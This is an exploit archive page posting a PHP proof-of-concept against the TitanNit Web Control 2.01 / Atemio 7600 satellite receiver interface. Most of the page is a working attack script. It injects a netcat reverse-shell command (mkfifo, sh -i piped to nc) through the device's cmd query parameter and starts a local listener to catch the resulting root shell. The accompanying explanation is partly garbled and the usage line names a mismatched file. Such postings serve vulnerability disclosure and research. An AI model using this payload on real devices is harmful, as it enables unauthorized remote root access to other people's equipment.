what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

TitanNit Web Control 2.01 / Atemio 7600 Code Injection

TitanNit Web Control 2.01 / Atemio 7600 Code Injection
Posted Oct 2, 2024
Authored by indoushka

TitanNit Web Control 2.01 and Atemio 7600 suffer from a PHP code injection vulnerability.

tags | exploit, web, php
SHA-256 | ae322d271852c8f25de18f6d647d31c02a2bc3f366c6ee1f1c7d3ed36bff9c05

TitanNit Web Control 2.01 / Atemio 7600 Code Injection

Change Mirror Download
=============================================================================================================================================
| # Title : TitanNit Web Control 2.01 / Atemio 7600 php code injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.1 (64 bits) |
| # Vendor : https://www.sat-world.com/Atemio-AM-520-HD-TitanNit-Edition |
=============================================================================================================================================

poc :

[+] Explanation:

We used the exec function to run the nc(netcat) command which subscribes to the subscriptions offered by the privileged execution.

In Windows environments, you can use the netcat tool for communications headsets.

Note: Make sure that netcat is installed on your system (you can download netcat for Windows).

[+] save as poc.php

[+] Usage : C:\www\test>php 3.php poc.php

[+] payload :

<?php

class RemoteControl {

private $timeout = 10;
private $target;
private $callback;
private $path = "/query?getcommand=&cmd=";
private $lport;
private $cmd;

public function beacon() {
$this->cmd = "mkfifo /tmp/j;cat /tmp/j|sh -i 2>&1|nc ";
$this->cmd .= $this->callback . " ";
$this->cmd .= $this->lport . " ";
$this->cmd .= ">/tmp/j";
$this->path .= $this->cmd;

$ch = curl_init($this->target . $this->path);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_exec($ch);
curl_close($ch);
}

public function slusaj() {
echo "[*] Listening on port " . $this->lport . "\n";
sleep(1);

// Windows solution using exec
$cmd = "nc -lvp " . $this->lport; // Example with netcat listener
exec($cmd, $output, $result_code);

if ($result_code == 0) {
echo "[*] Rootshell session opened\n";
foreach ($output as $line) {
echo $line . "\n";
}
} else {
echo "[!] Error in executing the listener\n";
}
}

public function tajmer() {
for ($z = $this->timeout; $z > 0; $z--) {
echo "[*] Callback waiting: " . $z . "s\r";
sleep(1);
}
}

public function thricer() {
echo "[*] Starting callback listener\n";

// Run listener in the background using exec
$this->slusaj();

echo "[*] Generating callback payload\n";
sleep(1);
echo "[*] Calling\n";
$this->beacon();
}

public function howto($argv) {
if (count($argv) != 4) {
$this->usage();
} else {
$this->target = $argv[1];
$this->callback = $argv[2];
$this->lport = (int)$argv[3];

if (strpos($this->target, "http") === false) {
$this->target = "http://" . $this->target;
}
}
}

public function dostabesemolk() {

}

public function usage() {
$this->dostabesemolk();
echo "Usage: php titan.php <target ip> <listen ip> <listen port>\n";
echo "Example: php titan.php 192.168.1.13:20000 192.168.1.8 9999\n";
exit(0);
}

public function main($argv) {
$this->howto($argv);
$this->thricer();
}
}

$control = new RemoteControl();
$control->main($argv);
?>



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close